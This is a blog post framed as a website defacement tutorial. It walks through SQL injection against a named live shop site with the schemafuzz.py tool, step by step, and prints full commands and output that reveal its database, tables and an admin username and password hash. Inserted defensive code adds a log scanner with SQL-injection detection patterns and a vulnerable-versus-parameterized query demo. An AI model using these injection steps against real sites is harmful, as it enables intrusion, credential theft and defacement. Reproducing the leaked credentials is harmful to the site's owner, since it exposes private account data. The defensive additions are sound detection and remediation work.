Thursday, May 21, 2009

Defacing a Website Using Schemafuzz.py

What you need to prepare:
1. Python
2. Schemafuzz.py
3. CMD

Open CMD and change into the schemafuzz.py folder.
Run it with the command >> schemafuzz.py -u "target" --command

To make it clearer, let's go straight to the scene, hahaha

1. Find a target. This is our target >>>
http://www.sleeppost.com/viewproduct.php?pid=923

2. Check the number of columns
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923" --findcol

The output will be:


[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923--
[+] Evasion Used: "+" "--"
[+] 09:44:10
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,
[+] Column Length is: 7
[+] Found null column at column #: 0
[+] SQLi URL: http://www.sleeppost.com/viewproduct.ph … +UNION+SEL
CT+0,1,2,3,4,5,6--
[+] darkc0de URL: http://www.sleeppost.com/viewproduct.ph … +1=2+UNION
SELECT+darkc0de,1,2,3,4,5,6
[-] Done!


So this is the URL we use for the injection:
http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6


3. Find the database
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --dbs



[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 09:56:47
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] ??sleeppo_store?

[-] 09:57:00
[-] Total URL Requests 3
[-] Done


See, the database name shows up, hahaha: sleeppo_store


4. Find the table names in the database
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --schema -D sleeppo_store



[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:02:56
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing Tables & Columns from database "sleeppo_store"
[+] Number of Tables: 20

[Database]: sleeppo_store
[Table: Columns]

[0]advertisement: id,image,url
[1]brands: name
[2]category: cid,parent,name
[3]config: adminemail1,adminemail2,adminemail3,salesemail,enquiryemail,adminlogi
n,adminpassword,orderemailsubject,orderemailheader,orderemailfooter,orderwebhead
er,orderwebfooter,sms
[4]emailgroup: gid,name
[5]emailgroupmember: gid,email
[6]emails: email,name
[7]faqreply: fid,faqquestion,faqanswer,fdate
[8]faqrequest: fid,email,faqquestion,fdate,status,name,contact
[9]news: nid,title,detail,ndate,link_cid,link_pid,active
[10]orderitem: ordernum,pid,pname,vid,brand,variance,price,sellprice,discount,qty,type
[11]orders: ordernum,name,email,contact,address,status,country,ddate,dname,demai
l,dcontact,daddress,dcountry,paytype,worldpayid,ttime,remarks,refno,deliverydate
,deliverytime,paymentmode,remarks2
[12]outlet: outlet_id,outlet_name,outlet_address,outlet_tel
[13]product: pid,cid,brand,name,pno,detail,recommend
[14]productrel: pid,vtype,variance
[15]productvariance: vid,pid,variance,thick,vtype,vno,detail,price,sellprice,firm,colour
[16]promotionitems: id,promotion_id,item_type,cid,brand,pid,vid,discount,rating
[17]promotions: promotion_id,title,detail,startdate,enddate
[18]users: uid,name,email,contact,address
[19]warranty: wid,name,address,email,submitdate,date,invoice,model,size,period,s
urvey,qty

[-] 10:24:51
[-] Total URL Requests 139
[-] Done


So the site has 20 tables, and the columns are listed too. Just pick which one you want to exploit :p


5. Exploit the table and columns
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --dump -D sleeppo_store -T config -C adminlogin,adminpassword



[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:36:59
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Dumping data from database "sleeppo_store" Table "config"
[+] and Column(s) ['adminlogin', 'adminpassword']
[+] Number of Rows: 3

[0] liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn:
[1] No data
[2] No data
[3] No data

[-] 10:37:36
[-] Total URL Requests 5
[-] Done


Hehehe... the username and password are now visible; the password just needs to be decrypted ;)

The method above applies to SQL version 5. For version 4, use the --fuzz command to find the table and column names.

Example: schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --fuzz
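Seen from the server side, every step above leaves the same request shape in the web access log: a numeric parameter followed by AND 1=2, UNION SELECT, the darkc0de marker and a trailing "--". The following is an added example (not part of the original post or of schemafuzz.py) that flags those shapes in combined-format access logs. The log lines, IP addresses, rule names and the burst threshold are constructed assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus, urlsplit

# Combined-log-format line: client IP ... "METHOD target PROTO"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

# Rules keyed to the request shapes visible in the tool output above.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "always_false": re.compile(r"\band\s+1\s*=\s*2\b", re.I),
    "sql_comment_tail": re.compile(r"(?:--|#|/\*)\s*$"),
    "schema_probe": re.compile(r"\binformation_schema\b", re.I),
    "tool_marker": re.compile(r"darkc0de", re.I),
}

def classify(target):
    """Return the sorted rule names matched by the URL-decoded query string."""
    query = unquote_plus(urlsplit(target).query)
    return sorted(name for name, rx in RULES.items() if rx.search(query))

def scan(log_text, burst=3):
    """Map client IP -> rule hit counts, plus a flag for repeated UNION probes."""
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        for rule in classify(m.group(2)):
            per_ip[m.group(1)][rule] += 1
    return {ip: {"hits": dict(c), "burst": c["union_select"] >= burst}
            for ip, c in per_ip.items()}

# Constructed sample lines (documentation IP ranges, placeholder paths).
SAMPLE_LOG = """\
198.51.100.4 - - [21/May/2009:09:40:01 +0000] "GET /viewproduct.php?pid=923 HTTP/1.1" 200 5120
203.0.113.7 - - [21/May/2009:09:44:10 +0000] "GET /viewproduct.php?pid=923+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6-- HTTP/1.1" 200 4801
203.0.113.7 - - [21/May/2009:09:44:11 +0000] "GET /viewproduct.php?pid=923%20and%201=2%20union%20select%20darkc0de,1,2,3,4,5,6-- HTTP/1.1" 200 4801
203.0.113.7 - - [21/May/2009:10:02:56 +0000] "GET /viewproduct.php?pid=923+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6+FROM+information_schema.tables-- HTTP/1.1" 200 4950
198.51.100.4 - - [21/May/2009:10:05:00 +0000] "GET /search.php?q=trade+union+news HTTP/1.1" 200 900
"""

if __name__ == "__main__":
    for ip, result in scan(SAMPLE_LOG).items():
        print(ip, result)
```

The query string is URL-decoded before matching, so the "+" and "%20" spacing variants are caught by the same rules, and an ordinary search for "trade union news" is not flagged.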


Some commands:
--fuzz >>> find column and table names on SQL v4
--schema >>> show the table names
--dump >>> show the contents of columns
--findcol >>> find the darkc0de (column)

Look up the others yourself. Just read the help.
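Every command above works only because the pid value from the URL becomes part of the SQL text. The following added example (not code from the original post or from the site) puts that pattern beside the fix, using Python's sqlite3 as a stand-in for the PHP/MySQL page. The schema, rows and function names are constructed assumptions, and the injected value is the marker form shown in the --findcol output with the marker quoted as a string.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the shop database (constructed schema and row)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE product (pid INTEGER PRIMARY KEY, cid, brand, name,
                              pno, detail, recommend);
        INSERT INTO product VALUES (923, 1, 'ExampleBrand', 'Example mattress',
                                    'P-923', 'demo row', 0);
    """)
    return db

def view_product_vulnerable(db, pid):
    # The request value is pasted into the SQL text, so it can change the
    # structure of the statement. This is the flaw the steps above rely on.
    return db.execute("SELECT * FROM product WHERE pid = " + pid).fetchall()

def view_product_bound(db, pid):
    # Parameter binding: the value travels separately from the SQL text,
    # so it is only ever compared as data and cannot add clauses.
    return db.execute("SELECT * FROM product WHERE pid = ?", (pid,)).fetchall()

def view_product_hardened(db, pid):
    # Allow-list first: pid must be a short run of ASCII digits.
    if not (pid.isascii() and pid.isdigit() and len(pid) <= 9):
        raise ValueError("pid must be a positive integer")
    return view_product_bound(db, int(pid))

# Constructed input in the shape shown on the page: always-false predicate
# plus a 7-column UNION SELECT carrying the marker.
INJECTED = "923 AND 1=2 UNION SELECT 'darkc0de',1,2,3,4,5,6"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", view_product_vulnerable(db, INJECTED))
    print("bound only:", view_product_bound(db, INJECTED))
    try:
        view_product_hardened(db, INJECTED)
    except ValueError as exc:
        print("hardened :", exc)
    print("hardened, valid pid:", view_product_hardened(db, "923"))
```

On the PHP/MySQL stack shown in the tool output, the same fix is a prepared statement through PDO or mysqli with the pid value bound as an integer.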


2 comments:

Anonymous said...

Well, of course it can be broken into.. that site was made by you, after all..! I could show off like that too.!
by hexa

Melvin Hendrik Tambunan said...

Thanks for the tutorial, bro.... I'll try to study it some more so I can be as smart as you...
